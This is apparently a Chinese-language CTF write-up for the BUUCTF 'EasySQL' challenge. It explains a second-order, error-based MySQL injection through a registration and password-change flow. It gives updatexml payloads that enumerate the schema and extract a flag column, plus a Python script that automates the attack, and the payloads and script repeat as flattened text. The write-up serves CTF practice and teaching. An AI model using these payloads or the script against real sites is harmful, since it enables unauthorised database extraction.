EasySQL

进入后台之后有个修改密码功能，猜报错注入。注册页面有危险字符过滤，由于BUU的靶机顶不住fuzz，只能稍微fuzz了一下，一堆429，发现反斜杠、括号以及单双引号还是都能用。

那么可以猜出来查询语句的结构：

select * from user where username="{$username}" and pwd='{md5($password)}'

比较难搞的就是pwd的变量是有经过md5编码的，那么注入点就只能从$username搞起来了。又是二次注入，每次都需要注册再修改，很蛋疼。尝试报错注入，由于不能扫，本地拼接了再远程，很麻烦：

admin"||updatexml(1,concat(0x7e,(version()),0x7e),1);#
admin"||updatexml(1,concat(0x7e,(select(group_concat(TABLE_SCHEMA))from(information_schema.tables)),0x7e),1);#
admin"||updatexml(1,concat(0x7e,(select(group_concat(TABLE_NAME))from(information_schema.tables)WHERE(TABLE_SCHEMA=database())),0x7e),1);#
admin"||updatexml(1,concat(0x7e,(select(group_concat(COLUMN_NAME))from(information_schema.columns)WHERE(TABLE_NAME='users'))),1);#
admin"||updatexml(1,concat(0x7e,(select(real_flag_1s_here)from(users))),1);#
admin"||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1))#
admin"||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),1));#

脚本

import requests

url_reg = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/register.php'
url_log = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/login.php'
url_change = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/changepwd.php'

pre = 'peri0d"'
suf = "'))),1))#"

s = 'abcdefghijklmnopqrstuvwxyz1234567890'
s = list(s)

r = requests.session()

def register(name):
	data = {
		'username' : name,
		'password' : '123',
		'email' : '123',
	}
	r.post(url=url_reg, data=data)

def login(name):
	data = {
		'username' : name,
		'password' : '123',
	}
	r.post(url=url_log, data=data)
	
def changepwd():
	data = {
		'oldpass' : '',
		'newpass' : '',
	}
	kk = r.post(url=url_change, data=data)
	if 'target' not in kk.text:
		print(kk.text)

for i in s:
	paylaod = pre + "||(updatexml(1,concat((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + suf
	register(paylaod)
	login(paylaod)
	changepwd()

Previous2015 RCTF Next2016 0CTF

Last updated 2 years ago

admin"||updatexml(1,concat(0x7e,(version()),0x7e),1);# admin"||updatexml(1,concat(0x7e,(select(group_concat(TABLE_SCHEMA))from(information_schema.tables)),0x7e),1);# admin"||updatexml(1,concat(0x7e,(select(group_concat(TABLE_NAME))from(information_schema.tables)WHERE(TABLE_SCHEMA=database())),0x7e),1);# admin"||updatexml(1,concat(0x7e,(select(group_concat(COLUMN_NAME))from(information_schema.columns)WHERE(TABLE_NAME='users'))),1);# admin"||updatexml(1,concat(0x7e,(select(real_flag_1s_here)from(users))),1);# admin"||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1))# admin"||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),1));#

import requests url_reg = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/register.php' url_log = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/login.php' url_change = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/changepwd.php' pre = 'peri0d"' suf = "'))),1))#" s = 'abcdefghijklmnopqrstuvwxyz1234567890' s = list(s) r = requests.session() def register(name): data = { 'username' : name, 'password' : '123', 'email' : '123', } r.post(url=url_reg, data=data) def login(name): data = { 'username' : name, 'password' : '123', } r.post(url=url_log, data=data) def changepwd(): data = { 'oldpass' : '', 'newpass' : '', } kk = r.post(url=url_change, data=data) if 'target' not in kk.text: print(kk.text) for i in s: paylaod = pre + "||(updatexml(1,concat((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + suf register(paylaod) login(paylaod) changepwd()